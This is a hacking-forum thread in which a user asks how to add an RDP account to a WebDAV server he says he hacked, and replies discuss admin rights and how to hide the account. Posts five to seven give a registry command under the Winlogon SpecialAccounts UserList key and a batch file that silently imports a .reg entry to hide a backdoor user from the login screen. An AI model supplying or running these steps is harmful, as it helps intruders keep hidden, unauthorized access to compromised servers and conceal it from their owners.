+ Reply to Thread
Results 1 to 7 of 7
  1. #1
    Junior Member
    Join Date
    Jan 2011
    Posts
    2

    do you know how to add a rdp user to a webdav i hacked?

    Please help me

  2. #2
    Banned
    Join Date
    Apr 2011
    Posts
    114
    you didn't hack it if you cant work out how to add a rdp user lol...

  3. #3
    Retired Retired boss's Avatar
    Join Date
    Mar 1998
    Posts
    1,561
    you need admin to add users, if someone runs the webserver as administrator they really shouldnt use a webserver and its an unlikely event

  4. #4
    Member
    Join Date
    Feb 2010
    Posts
    33
    I can add user if you have any user that have administrator privillege.

    But only want me need to know is that, How to make user invisible and to make user not to have privillege to change pasword

  5. #5
    Senior Member Pernat1y's Avatar
    Join Date
    Dec 2007
    Location
    USSR
    Posts
    2,016
    Quote Originally Posted by maskman007 View Post
    How to make user invisible
    reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserLis t" /v my_user /t REG_DWORD /d "00000000" /f
    Away for 1~3 years

  6. #6
    Banned
    Join Date
    Apr 2011
    Posts
    114
    Quote Originally Posted by Pernat1y View Post
    reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserLis t" /v my_user /t REG_DWORD /d "00000000" /f
    dont think this will not work without running as admin as its in local_machine but if he has access he should have admin anyway

  7. #7
    Member
    Join Date
    Feb 2010
    Posts
    33
    Quote Originally Posted by Pernat1y View Post
    reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserLis t" /v my_user /t REG_DWORD /d "00000000" /f
    I tried your comment and it never help, but I tried to use google and I found the commad below but still the user is not hidden in the computer management, can you please help me to look into the command and see what is missing so that i can re-create the batch file.

    Thanks for your contribution.

    @echo off
    echo Windows Registry Editor Version 5.00>win.reg
    echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserLis t]>>win.reg
    echo "YourHiddenUser"=dword:00000000>>win.reg
    REGEDIT /S win.REG
    DEL /Q win.REG

Thread Information

Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)

Similar Threads

  1. WebDAV help
    By SoDD in forum Delphi Help
    Replies: 1
    Last Post: 14-04-2011, 12:59
  2. [BASH] WebDAV Scanner
    By 3lit in forum Off-Topic
    Replies: 2
    Last Post: 27-01-2011, 21:01
  3. Webdav exploiter v1.1
    By Broomop in forum Malware Samples and Information
    Replies: 5
    Last Post: 09-01-2011, 21:12
  4. Webdav exploiter v1.0 By Broomop
    By Broomop in forum Malware Samples and Information
    Replies: 15
    Last Post: 02-12-2010, 00:01

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts

Search Engine Friendly URLs by vBSEO 3.6.0 ©2011, Crawlability, Inc.